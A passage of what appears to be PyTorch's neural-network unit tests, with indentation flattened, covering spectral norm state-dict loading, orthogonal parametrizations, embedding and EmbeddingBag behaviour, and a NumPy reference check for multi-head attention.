spectral_norm_m._v.data.copy_(saved_v)
wrapped_m.train()
out0 = wrapped_m(input)
wrapped_m.eval()
out1 = wrapped_m(input)
wrapped_m.train()
out2 = wrapped_m(input)
wrapped_m.eval()
out3 = wrapped_m(input)
return out0 + out1 + out2 + out3
gradcheck(fn, (input.clone().requires_grad_(),))
# assert that backprop reaches weight_orig in eval
if requires_grad:
def fn(weight):
return wrapped_m(input)
gradcheck(fn, (m.parametrizations.weight.original,))
def test_new_spectral_norm_load_state_dict(self):
for activate_times in (0, 3):
inp = torch.randn(2, 3)
m = nn.Linear(3, 5)
snm = torch.nn.utils.parametrizations.spectral_norm(m)
snm.train()
for _ in range(activate_times):
snm(inp)
state_dict = deepcopy(snm.state_dict())
self.assertEqual({
'parametrizations.weight.original',
'bias',
'parametrizations.weight.0._v',
'parametrizations.weight.0._u'
}, set(state_dict.keys()))
# test that non-strict loading works
non_strict_state_dict = deepcopy(state_dict)
non_strict_state_dict['nonsense'] = 'nonsense'
with self.assertRaisesRegex(RuntimeError, r'Unexpected key\(s\) in state_dict: "nonsense"'):
snm.load_state_dict(non_strict_state_dict, strict=True)
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.original']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.0._u']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['parametrizations.weight.0._v']
snm.load_state_dict(non_strict_state_dict, strict=False)
non_strict_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict._metadata['parametrizations.weight.0'] # remove metadata info
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight'] # remove W buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['bias']
snm.load_state_dict(non_strict_state_dict, strict=False)
# normal state_dict
# test that re-wrapping does not matter
m = torch.nn.utils.parametrize.remove_parametrizations(snm, 'weight')
snm = torch.nn.utils.parametrizations.spectral_norm(m)
snm.load_state_dict(state_dict)
with torch.no_grad():
snm.eval()
out0_eval = snm(inp)
snm.train()
out1_train = snm(inp)
out2_train = snm(inp)
snm.eval()
out3_eval = snm(inp)
# test that re-wrapping does not matter
m = torch.nn.utils.parametrize.remove_parametrizations(snm, 'weight')
snm = torch.nn.utils.parametrizations.spectral_norm(m)
# Test normal loading
snm.load_state_dict(state_dict)
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
@skipIfNoLapack
def test_spectral_norm_load_state_dict(self):
inp = torch.randn(2, 3)
for activate_times in (0, 3):
# Test backward compatibility
# At version None -> 1: weight becomes not a buffer and v vector becomes a buffer
m = nn.Linear(3, 5)
snm = torch.nn.utils.spectral_norm(m)
snm.train()
for _ in range(activate_times):
snm(inp)
version_latest_ref_state_dict = deepcopy(snm.state_dict())
self.assertEqual({'weight_orig', 'bias', 'weight_u', 'weight_v'}, set(version_latest_ref_state_dict.keys()))
# test that non-strict loading works
non_strict_state_dict = deepcopy(version_latest_ref_state_dict)
non_strict_state_dict['nonsense'] = 'nonsense'
with self.assertRaisesRegex(RuntimeError, r'Unexpected key\(s\) in state_dict: "nonsense"'):
snm.load_state_dict(non_strict_state_dict, strict=True)
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_orig']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_u']
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight_v']
snm.load_state_dict(non_strict_state_dict, strict=False)
non_strict_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict._metadata['']['spectral_norm'] # remove metadata info
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['weight'] # remove W buffer
snm.load_state_dict(non_strict_state_dict, strict=False)
del non_strict_state_dict['bias']
snm.load_state_dict(non_strict_state_dict, strict=False)
# craft a version None state_dict
version_none_state_dict = deepcopy(version_latest_ref_state_dict)
self.assertIn('spectral_norm', version_none_state_dict._metadata[''])
del version_none_state_dict._metadata['']['spectral_norm'] # remove metadata info
del version_none_state_dict['weight_v'] # remove v vector
version_none_state_dict['weight'] = snm.weight.detach().clone() # set W as a buffer
# normal state_dict
for version_latest_with_metadata in [True, False]:
version_latest_state_dict = deepcopy(version_latest_ref_state_dict)
if not version_latest_with_metadata:
# We want to still load a user-crafted state_dict, one without metadata
del version_latest_state_dict._metadata['']['spectral_norm']
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
snm.load_state_dict(version_latest_ref_state_dict)
with torch.no_grad():
snm.eval()
out0_eval = snm(inp)
snm.train()
out1_train = snm(inp)
out2_train = snm(inp)
snm.eval()
out3_eval = snm(inp)
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
snm.load_state_dict(version_none_state_dict)
if activate_times > 0:
# since in loading version None state dict, we assume that the
# values in the state dict have gone through at lease one
# forward, we only test for equivalence when activate_times > 0.
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
# test that re-wrapping does not matter
m = torch.nn.utils.remove_spectral_norm(snm)
snm = torch.nn.utils.spectral_norm(m)
# Test normal loading
snm.load_state_dict(version_latest_state_dict)
with torch.no_grad():
snm.eval()
self.assertEqual(out0_eval, snm(inp))
snm.train()
self.assertEqual(out1_train, snm(inp))
self.assertEqual(out2_train, snm(inp))
snm.eval()
self.assertEqual(out3_eval, snm(inp))
def test_spectral_norm_dim(self):
inp = torch.randn(2, 3, 10, 12)
m = nn.ConvTranspose2d(3, 4, (5, 6))
m = torch.nn.utils.spectral_norm(m)
# this should not run into incompatible shapes
x = m(inp)
# check that u refers to the same dimension
self.assertEqual(m.weight_u.shape, m.weight_orig[0, :, 0, 0].shape)
def test_new_spectral_norm_dim(self):
inp = torch.randn(2, 3, 10, 12)
m = nn.ConvTranspose2d(3, 4, (5, 6))
m = torch.nn.utils.parametrizations.spectral_norm(m)
snm = m.parametrizations.weight[0]
# this should not run into incompatible shapes
x = m(inp)
# check that u refers to the same dimension
self.assertEqual(snm._u.shape, m.parametrizations.weight.original[0, :, 0, 0].shape)
def test_spectral_norm_forward(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.spectral_norm(m)
# naive forward
_weight, _bias, _u = m.weight_orig, m.bias, m.weight_u
_weight_mat = _weight.view(_weight.size(0), -1)
_v = torch.mv(_weight_mat.t(), _u)
_v = F.normalize(_v, dim=0, eps=1e-12)
_u = torch.mv(_weight_mat, _v)
_u = F.normalize(_u, dim=0, eps=1e-12)
_weight.data /= torch.dot(_u, torch.matmul(_weight_mat, _v))
out_hat = torch.nn.functional.linear(input, _weight, _bias)
expect_out = m(input)
self.assertEqual(expect_out, out_hat)
def test_new_spectral_norm_forward(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.parametrizations.spectral_norm(m)
snm = m.parametrizations.weight[0]
# naive forward
_weight = m.parametrizations.weight.original
_bias, _v = m.bias, snm._v
_weight_mat = _weight.view(_weight.size(0), -1)
_u = torch.mv(_weight_mat, _v)
_u = F.normalize(_u, dim=0, eps=1e-12)
_v = torch.mv(_weight_mat.t(), _u)
_v = F.normalize(_v, dim=0, eps=1e-12)
_weight.data /= torch.dot(_u, torch.matmul(_weight_mat, _v))
out_hat = torch.nn.functional.linear(input, _weight, _bias)
expect_out = m(input)
self.assertEqual(expect_out, out_hat)
def test_spectral_norm_pickle(self):
m = torch.nn.utils.spectral_norm(nn.Linear(5, 7))
m = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m, nn.Linear)
def test_orthogonal_parametrization(self):
# Orthogonal implements 6 algorithms (3x parametrizations times 2 options of use_trivialization)
def assert_is_orthogonal(X):
n, k = X.size(-2), X.size(-1)
if n < k:
X = X.transpose(-2, -1)
n, k = k, n
Id = torch.eye(k, dtype=X.dtype, device=X.device).expand(*(X.size()[:-2]), k, k)
eps = 10 * n * torch.finfo(X.dtype).eps
torch.testing.assert_allclose(X.transpose(-2, -1).conj() @ X, Id, atol=eps, rtol=0.)
def assert_weight_allclose_Q(weight, W):
# Test that weight is equal to the Q part of the QR decomposition of W
# (or of its transpose if the matrix is wide)
wide_matrix = W.size(-2) < W.size(-1)
if wide_matrix:
W = W.transpose(-2, -1)
Q, R = torch.linalg.qr(W)
Q *= R.diagonal(dim1=-2, dim2=-1).sgn().unsqueeze(-2)
if wide_matrix:
Q = Q.transpose(-2, -1)
torch.testing.assert_allclose(Q, weight, atol=1e-5, rtol=0.)
for shape, dtype, use_linear in product(((4, 4), (5, 3), (3, 5)), # square/ tall / wide
(torch.float32, torch.complex64),
(True, False)):
# Conv2d does not support complex yet
if not use_linear and dtype.is_complex:
continue
if use_linear:
input = torch.randn(3, shape[0], dtype=dtype)
else:
input = torch.randn(2, 2, shape[0] + 2, shape[1] + 1, dtype=dtype)
for parametrization, use_trivialization in product(("matrix_exp", "cayley", "householder"),
(False, True)):
# right_inverse for Cayley and matrix_exp not implemented for use_trivialization=False
# See Note [right_inverse expm cayley]
can_initialize = use_trivialization or parametrization == "householder"
# We generate them every time to always start with fresh weights
if use_linear:
m = nn.Linear(*shape, dtype=dtype)
else:
m = nn.Conv2d(2, 3, shape, dtype=dtype)
# We do not support householder for complex inputs
# See Note [Householder complex]
w_init = m.weight.clone()
if parametrization == "householder" and m.weight.is_complex():
msg = "householder parametrization does not support complex tensors"
with self.assertRaisesRegex(ValueError, msg):
torch.nn.utils.parametrizations.orthogonal(m,
"weight",
parametrization,
use_trivialization=use_trivialization)
continue
wide_matrix = w_init.size(-2) < w_init.size(-1)
torch.nn.utils.parametrizations.orthogonal(m,
"weight",
parametrization,
use_trivialization=use_trivialization)
# Forwards works as expected
self.assertEqual(w_init.shape, m.weight.shape)
assert_is_orthogonal(m.weight)
if can_initialize:
assert_weight_allclose_Q(m.weight, w_init)
# Intializing with a given orthogonal matrix works
X = torch.randn_like(m.weight)
if wide_matrix:
X = X.transpose(-2, -1)
w_new = torch.linalg.qr(X).Q
if wide_matrix:
w_new = w_new.transpose(-2, -1)
if can_initialize:
m.weight = w_new
torch.testing.assert_allclose(w_new, m.weight, atol=1e-5, rtol=0.)
else:
msg = "assign to the matrix exponential or the Cayley parametrization"
with self.assertRaisesRegex(NotImplementedError, msg):
m.weight = w_new
# Intializing with a non-orthogonal matrix makes m.weight be the Q part of the given matrix
w_new = torch.randn_like(m.weight)
if can_initialize:
m.weight = w_new
assert_weight_allclose_Q(m.weight, w_new)
else:
msg = "assign to the matrix exponential or the Cayley parametrization"
with self.assertRaisesRegex(NotImplementedError, msg):
m.weight = w_new
opt = torch.optim.SGD(m.parameters(), lr=0.1)
for _ in range(2):
opt.zero_grad()
m(input).norm().backward()
grad = m.parametrizations.weight.original.grad
self.assertIsNotNone(grad)
# We do not update the upper triangular part of the matrix if tall tril if wide
if grad.size(-2) >= grad.size(-1):
zeros_grad = grad.triu(1)
else:
zeros_grad = grad.tril(-1)
self.assertEqual(zeros_grad, torch.zeros_like(zeros_grad))
# The gradient in the diagonal can only be imaginary because a skew-Hermitian
# matrix has imaginary diagonal
diag_grad = grad.diagonal(dim1=-2, dim2=-1)
if grad.is_complex():
diag_grad = diag_grad.real
self.assertEqual(diag_grad, torch.zeros_like(diag_grad))
opt.step()
assert_is_orthogonal(m.weight)
def test_orthogonal_errors(self):
m = nn.Linear(3, 4)
with self.assertRaisesRegex(ValueError, "has to be one of"):
torch.nn.utils.parametrizations.orthogonal(m, "weight", "foo")
with self.assertRaisesRegex(ValueError, "Expected a matrix"):
torch.nn.utils.parametrizations.orthogonal(m, "bias")
torch.nn.utils.parametrizations.orthogonal(m, "weight")
with self.assertRaisesRegex(ValueError, "matrices of shape"):
m.weight = torch.randn(5, 5)
torch.nn.utils.parametrize.remove_parametrizations(m, "weight")
def test_threshold_int(self):
x = torch.tensor([-3, -2, -1, 0, 1, 2, 3])
expected = torch.tensor([99, 99, 99, 99, 1, 2, 3])
self.assertEqual(F.threshold(x, 0, 99), expected)
def test_threshold_bfloat16(self):
x = torch.randn(100)
for threshold in [0, -0.5, 0.5, float('inf'), float('-inf'), float('nan')]:
expected = F.threshold(x, threshold, 0).bfloat16().float()
res_bf16 = F.threshold(x.bfloat16(), threshold, 0).float()
self.assertEqual(res_bf16, expected)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_embedding_max_norm_unsorted_repeating_indices(self):
def create_embedding(device):
# Seed RNG so we get the same Embedding each time
torch.manual_seed(0)
return torch.nn.Embedding(
num_embeddings=20,
embedding_dim=64,
max_norm=1.0).to(device)
ix = torch.arange(2, device='cpu', dtype=torch.long).repeat(2000)
out_cpu = create_embedding('cpu')(ix)
ix = ix.to('cuda')
out = create_embedding('cuda')(ix)
self.assertEqual(out.cpu(), out_cpu)
def test_embedding_sparse_basic(self):
embedding = nn.Embedding(10, 20, sparse=True)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long)
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
def test_embedding_sparse_empty_tensor(self):
embedding = nn.Embedding(0, 0, sparse=True)
input = torch.tensor([], dtype=torch.int64)
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
embedding = nn.Embedding(10, 0, sparse=True)
input = torch.LongTensor([[0, 2, 4, 5], [4, 3, 0, 9]])
embedding(input).sum().backward()
self.assertTrue(embedding.weight.grad.is_sparse)
self.assertEqual(embedding.weight.grad.shape, embedding.weight.shape)
def test_move_sparse_half_embedding(self):
embedding = nn.Embedding(10, 3, sparse=True)
self.assertEqual(embedding.weight.device.type, 'cpu')
self.assertEqual(embedding.weight.dtype, torch.float64)
embedding.to(torch.float16)
self.assertEqual(embedding.weight.dtype, torch.float16)
self.assertEqual(embedding.embedding_dim, 3)
self.assertEqual(embedding.num_embeddings, 10)
if torch.cuda.is_available():
embedding.to('cuda')
self.assertEqual(embedding.weight.device.type, 'cuda')
embedding.to('cpu')
self.assertEqual(embedding.weight.device.type, 'cpu')
def test_embedding_max_norm(self):
embedding = nn.Embedding(22, 5, max_norm=1.0)
input = torch.tensor([2, 8, 8, 6], dtype=torch.long)
output = embedding(input)
self.assertEqual(output[1], output[2])
self.assertTrue(output.data.norm(p=2, dim=1).le(1).all())
def test_embedding_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embedding = nn.Embedding.from_pretrained(a)
self.assertEqual(a, embedding.weight.data)
input = torch.LongTensor([0, 1])
output = embedding(input)
self.assertEqual(a, output)
def test_embedding_bag_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embedding = nn.EmbeddingBag.from_pretrained(a)
self.assertEqual(a, embedding.weight)
input = torch.tensor([0, 1], dtype=torch.long)
output = embedding(input, torch.arange(input.size(0)))
self.assertEqual(a, output)
def test_embedding_from_pretrained_padding_idx(self):
padding_idx = 2
padding_vec = torch.ones(3) * 7
embeddings = torch.rand(4, 3, requires_grad=True)
with torch.no_grad():
embeddings[padding_idx] = padding_vec
embedding_nn = nn.Embedding.from_pretrained(embeddings, padding_idx=padding_idx)
self.assertEqual(embedding_nn.weight[padding_idx], padding_vec)
def test_embedding_bag_from_pretrained_padding_idx(self):
padding_idx = 2
embeddings = torch.rand(4, 3, requires_grad=True)
embedding_nn = nn.EmbeddingBag.from_pretrained(embeddings, padding_idx=padding_idx)
self.assertEqual(embedding_nn.weight, embeddings)
def test_embedding_from_pretrained_options(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
opts = {
"max_norm": 2.,
"norm_type": .5,
"scale_grad_by_freq": False,
"sparse": True
}
embedding = nn.Embedding.from_pretrained(a, **opts)
input = torch.LongTensor([0, 1])
output = embedding(input)
# test output and that weight matrix was renormalized
self.assertEqual(a, output)
self.assertTrue(a.ne(torch.arange(1, 7, dtype=a.dtype).view(2, 3)).all())
self.assertTrue(output.data.norm(p=opts["norm_type"], dim=1).le(opts["max_norm"]).all())
def test_embedding_functional(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
embeddings = torch.rand(4, 3, requires_grad=True)
embed_old = torch.nn.Embedding(4, 3)
embed_old.weight.data = embeddings.data
res_old = embed_old(a)
res_F = F.embedding(a, embeddings)
self.assertEqual(res_old, res_F)
embed_old = torch.nn.Embedding(4, 3)
embed_old = embed_old.from_pretrained(embeddings, padding_idx=2)
res_old = embed_old(a)
res_F = F.embedding(a, embeddings, padding_idx=2)
self.assertEqual(res_old, res_F)
def test_embedding_bag_functional(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
embeddings = torch.rand(4, 3, requires_grad=True)
embed_old = torch.nn.EmbeddingBag(4, 3)
embed_old.weight = torch.nn.Parameter(embeddings)
res_old = embed_old(a)
res_F = F.embedding_bag(a, embeddings)
self.assertEqual(res_old, res_F)
embed_old = torch.nn.EmbeddingBag(4, 3)
embed_old = embed_old.from_pretrained(embeddings, padding_idx=2)
res_old = embed_old(a)
res_F = F.embedding_bag(a, embeddings, padding_idx=2)
self.assertEqual(res_old, res_F)
# Make sure that error is thrown if padding_idx is out of bounds
def test_embedding_bag_padding_idx_error(self):
a = torch.tensor([
[1, 3, 2],
[0, 2, 1]
], dtype=torch.long)
num_embeddings = 4
num_features = 3
embeddings = torch.rand(num_embeddings, num_features, requires_grad=True)
functional_err_msg = r'padding_idx must be within the number of embeddings'
module_err_msg = r'padding_idx must be within num_embeddings'
for padding_idx in range(-(num_embeddings + 2), (num_embeddings + 2)):
if (padding_idx < -num_embeddings) or (padding_idx >= num_embeddings):
with self.assertRaisesRegex(RuntimeError, functional_err_msg):
F.embedding_bag(a, embeddings, padding_idx=padding_idx)
with self.assertRaisesRegex(AssertionError, module_err_msg):
torch.nn.EmbeddingBag(num_embeddings, num_features, padding_idx=padding_idx)
else:
F.embedding_bag(a, embeddings, padding_idx=padding_idx)
torch.nn.EmbeddingBag(num_embeddings, num_features, padding_idx=padding_idx)
@unittest.skipUnless('fbgemm' in torch.backends.quantized.supported_engines,
'Linear_FP16_weight requires FBGEMM. FBGEMM is only optimized for CPUs'
' with instruction set support avx2 or newer.')
def test_fb_fc_packed(self):
X = np.random.rand(16, 16).astype(np.float32) - 0.5
W = np.random.rand(16, 16).astype(np.float32) - 0.5
b = np.random.rand(16).astype(np.float32) - 0.5
def fc_op(X, W, b):
return np.dot(X, W.T) + b
x_tensor = torch.tensor(X)
w_tensor = torch.tensor(W)
b_tensor = torch.tensor(b)
packed_w_tensor = torch.fbgemm_pack_gemm_matrix_fp16(w_tensor)
actual_output = torch.fbgemm_linear_fp16_weight(x_tensor, packed_w_tensor, b_tensor)
expected_output = fc_op(X, W, b)
torch.testing.assert_close(torch.from_numpy(expected_output), actual_output.cpu(), atol=1e-3, rtol=1e-3)
def test_embeddingbag_from_pretrained(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
embeddingbag = nn.EmbeddingBag.from_pretrained(a)
self.assertEqual(a, embeddingbag.weight.data)
input = torch.LongTensor([[0, 1]])
output = embeddingbag(input)
self.assertEqual(a.mean(0, keepdim=True), output)
def test_embeddingbag_from_pretrained_options(self):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
opts = {
"max_norm": 2.,
"norm_type": .5,
"scale_grad_by_freq": False,
"mode": "max",
"sparse": False
}
embeddingbag = nn.EmbeddingBag.from_pretrained(a, **opts)
input = torch.LongTensor([[0, 1]])
output = embeddingbag(input)
self.assertEqual(a.max(0, keepdim=True)[0], output)
self.assertTrue(a.ne(torch.arange(1, 7, dtype=a.dtype).view(2, 3)).all())
self.assertTrue(a.norm(p=opts["norm_type"], dim=1).le(opts["max_norm"]).all())
def test_AlphaDropout(self):
# generate random tensor with zero mean and unit std
input = torch.randn(5000)
self._test_alpha_dropout(nn.AlphaDropout, input)
def test_FeatureAlphaDropout(self):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
d = random.randint(1, 2)
num_features = 1000
input = torch.randn(num_features, b, d, w, h)
self._test_alpha_dropout(nn.FeatureAlphaDropout, input)
# no batch dims
input = torch.randn(50, 20, 64, 64)
self._test_alpha_dropout(nn.FeatureAlphaDropout, input)
def test_pad_scalar_error(self):
inputs = torch.tensor(0., requires_grad=True)
self.assertRaises(AssertionError, lambda: F.pad(inputs, (1, 1)))
self.assertRaises(AssertionError, lambda: F.pad(inputs, (1,)))
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_multihead_attention(self):
def _scaled_dot_attn_ref(Q, K, V, dims, unseen_mask=None, key_padding_mask=None):
""" Numpy-based reference implementation of scaled dot attention
for testing"""
QKT = _batchmatmul(
Q,
np.transpose(K, axes=[0, 1, 3, 2])
/ np.sqrt(dims[3], dtype=np.float32), # divide by sqrt(d_head)
)
b1, b2, s1, s2 = QKT.shape
if unseen_mask is not None or key_padding_mask is not None:
# assert s1 == s2
for i in range(b1):
for j in range(b2):
for m in range(s1):
for n in range(s2):
if unseen_mask is not None and unseen_mask[m][n] == 0:
QKT[i, j, m, n] = -np.inf
if key_padding_mask is not None and key_padding_mask[i][n]:
QKT[i, j, m, n] = -np.inf
reference = _softmax(QKT)
ref_attn_weight = reference
ref_attn_weight = np.sum(ref_attn_weight, axis=1) / b2
reference = _batchmatmul(reference, V)
return reference, ref_attn_weight
def _batchmatmul(a, b): # batchmatmul over 4 dim matrix
""" Numpy-based batch matrix multiply over 4 dim matrix"""
assert a.shape[0] == b.shape[0]
assert a.shape[1] == b.shape[1]
retval = np.zeros(
(a.shape[0], a.shape[1], a.shape[2], b.shape[3]), dtype=np.float32
)
for i in range(a.shape[0]):
for j in range(a.shape[1]):
retval[i, j, :, :] = np.matmul(a[i, j, :, :], b[i, j, :, :])
return retval
def _softmax(x): # softmax over 4 dim matrix
""" Numpy-based reference softmax over 4 dim matrix"""
np.seterr(invalid='ignore')
output = np.zeros(x.shape, dtype=np.float64)
for i in range(x.shape[0]):
for j in range(x.shape[1]):
for k in range(x.shape[2]):
x_curr = x[i, j, k, :]
e_x = np.exp(x_curr - np.amax(x_curr))
output[i, j, k, :] = e_x / np.sum(e_x)
return output
def _split_heads_ref(X, dims, nheads, d_head):
X_split = np.reshape(X, dims[:2] + [nheads, d_head])
X_split_transposed = np.transpose(X_split, [0, 2, 1, 3])
reference = np.reshape(X_split_transposed, [dims[0], nheads, dims[1], d_head])
return reference
def _combine_heads_ref(X, dims, nheads, d_head):
X_transposed = np.transpose(X, [0, 2, 1, 3])
reference = np.reshape(X_transposed, dims[:2] + [nheads * d_head])
return reference
def _fc(X, X_weight, X_bias):
X_fc_b = X_bias.detach().numpy()
X_fc_w = X_weight.detach().numpy()
return np.matmul(X, np.transpose(X_fc_w)) + X_fc_b
def _create_src_lengths_mask(batch_size, src_lengths):
"""
Generate boolean mask to prevent attention beyond the end of source
Inputs:
batch_size : int
src_lengths : [batch_size] of sentence lengths
Outputs:
[batch_size, max_src_len]
"""
max_srclen = src_lengths.max()
src_indices = torch.arange(0, max_srclen).unsqueeze(0).to(src_lengths)
src_indices = src_indices.expand(batch_size, max_srclen)
src_lengths = src_lengths.unsqueeze(dim=1).expand(batch_size, max_srclen)
# returns [batch_size, max_seq_len]
return (src_indices < src_lengths).int().detach()
def _multihead_attn_test_helper(add_key_padding_mask=False, add_bias_kv=False, add_zero_attn=False,
saved_kv=False, same_embed_dim=False, byte_mask=False):
for _ in range(100):
batch_sz, seq_len = [random.randint(2, 10) for r in range(2)]
d_head = random.randint(3, 10)
nheads = random.randint(3, 10)
d_model = d_head * nheads
if same_embed_dim:
kv_dim = d_model
else:
kv_dim = random.randint(5, 20)
dims = [batch_sz, seq_len, kv_dim]
saved_k = None
saved_k_tensor = None
saved_v = None
saved_v_tensor = None
if saved_kv:
saved_k = np.random.rand(batch_sz * nheads, seq_len, d_head)
saved_k_tensor = torch.from_numpy(saved_k).to(torch.get_default_dtype())
saved_v = np.random.rand(batch_sz * nheads, seq_len, d_head)
saved_v_tensor = torch.from_numpy(saved_v).to(torch.get_default_dtype())
key_padding_mask = None
key_padding_mask_tensor = None
if add_key_padding_mask:
seq_mask = np.random.randint(0, 2, (1, seq_len))
key_padding_mask = (np.repeat(seq_mask, batch_sz, axis=0) == 1)
key_padding_mask_tensor = torch.from_numpy(key_padding_mask)
if byte_mask:
key_padding_mask_tensor = key_padding_mask_tensor.byte()
decoder_state = np.random.rand(batch_sz, d_model)
K = np.random.rand(*dims)
V = K
Q = np.expand_dims(decoder_state, 1)
attn_mask = np.random.randint(0 , 2, size=(1, seq_len))
attn_mask_tensor = torch.from_numpy(attn_mask).float()
if byte_mask:
attn_mask_tensor = (attn_mask_tensor == 0).byte()
else:
attn_mask_tensor.masked_fill_(attn_mask_tensor == 0, float('-inf'))
attn_mask_tensor.masked_fill_(attn_mask_tensor > 0, float('0.0'))
attn_mask_tensor = attn_mask_tensor.double()
decoder_state_tensor = torch.from_numpy(decoder_state).to(torch.get_default_dtype())
source_hid_tensor = torch.from_numpy(K).to(torch.get_default_dtype()).transpose(0, 1)
multihead_attn_module = MultiheadAttention(d_model, nheads,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
kdim=kv_dim, vdim=kv_dim)
if add_bias_kv:
bias_k = multihead_attn_module.bias_k.detach().numpy()
bias_v = multihead_attn_module.bias_v.detach().numpy()
else:
bias_k = None
bias_v = None
_Q = decoder_state_tensor.unsqueeze(1).transpose(0, 1)
_V = source_hid_tensor
_K = source_hid_tensor
if multihead_attn_module._qkv_same_embed_dim:
result, result_weight = torch.nn.functional.multi_head_attention_forward(
_Q, _K, _V,
d_model, nheads,
multihead_attn_module.in_proj_weight, multihead_attn_module.in_proj_bias,
multihead_attn_module.bias_k, multihead_attn_module.bias_v,
multihead_attn_module.add_zero_attn, multihead_attn_module.dropout,
multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias,
multihead_attn_module.training, key_padding_mask_tensor, True, attn_mask_tensor,
static_k=saved_k_tensor, static_v=saved_v_tensor)
else:
result, result_weight = torch.nn.functional.multi_head_attention_forward(
_Q, _K, _V,
d_model, nheads,
None, multihead_attn_module.in_proj_bias,
multihead_attn_module.bias_k, multihead_attn_module.bias_v,
multihead_attn_module.add_zero_attn, multihead_attn_module.dropout,
multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias,
multihead_attn_module.training, key_padding_mask_tensor, True, attn_mask_tensor,
True, multihead_attn_module.q_proj_weight,
multihead_attn_module.k_proj_weight, multihead_attn_module.v_proj_weight,
static_k=saved_k_tensor, static_v=saved_v_tensor)
result = result.squeeze(0).detach().numpy()
if multihead_attn_module._qkv_same_embed_dim:
q_proj_weight = multihead_attn_module.in_proj_weight[:d_model]
k_proj_weight = multihead_attn_module.in_proj_weight[d_model:(d_model * 2)]
v_proj_weight = multihead_attn_module.in_proj_weight[(d_model * 2):]
else:
q_proj_weight = multihead_attn_module.q_proj_weight
k_proj_weight = multihead_attn_module.k_proj_weight
v_proj_weight = multihead_attn_module.v_proj_weight
Q_fc = _fc(Q, q_proj_weight, multihead_attn_module.in_proj_bias[:d_model])
K_fc = _fc(K, k_proj_weight, multihead_attn_module.in_proj_bias[d_model:(d_model * 2)])
V_fc = _fc(V, v_proj_weight, multihead_attn_module.in_proj_bias[(d_model * 2):])
if add_bias_kv:
K_fc = np.concatenate((K_fc, np.repeat(bias_k, K_fc.shape[0], axis=0)), axis=1)
V_fc = np.concatenate((V_fc, np.repeat(bias_v, V_fc.shape[0], axis=0)), axis=1)
if attn_mask is not None:
attn_mask = np.concatenate((attn_mask, np.ones([1, 1])), axis=1)
if key_padding_mask is not None:
key_padding_mask = np.concatenate((key_padding_mask, np.full((batch_sz, 1), False, dtype=bool)), axis=1)
dims[1] += 1
Q_split = _split_heads_ref(
Q_fc, [batch_sz, 1, d_model], nheads, d_head
)
if saved_k is not None:
K_split = np.reshape(saved_k, [dims[0], nheads, dims[1], d_head])
else:
K_split = _split_heads_ref(K_fc, dims, nheads, d_head)
if saved_v is not None:
V_split = np.reshape(saved_v, [dims[0], nheads, dims[1], d_head])
else:
V_split = _split_heads_ref(V_fc, dims, nheads, d_head)
if add_zero_attn:
dims[1] += 1
K_split = np.concatenate((K_split, np.zeros([K_split.shape[0], K_split.shape[1], 1, K_split.shape[3]])), axis=2)
V_split = np.concatenate((V_split, np.zeros([V_split.shape[0], V_split.shape[1], 1, V_split.shape[3]])), axis=2)
if attn_mask is not None:
attn_mask = np.concatenate((attn_mask, np.ones([1, 1])), axis=1)
if key_padding_mask is not None:
key_padding_mask = np.concatenate((key_padding_mask, np.full((batch_sz, 1), False, dtype=bool)), axis=1)
attn_heads, ref_attn_weight = _scaled_dot_attn_ref(
Q=Q_split,
K=K_split,
V=V_split,
dims=Q_split.shape,
unseen_mask=attn_mask,
key_padding_mask=key_padding_mask
)
combined_attn_heads = _combine_heads_ref(
X=attn_heads, dims=[batch_sz, 1], nheads=nheads, d_head=d_head
)
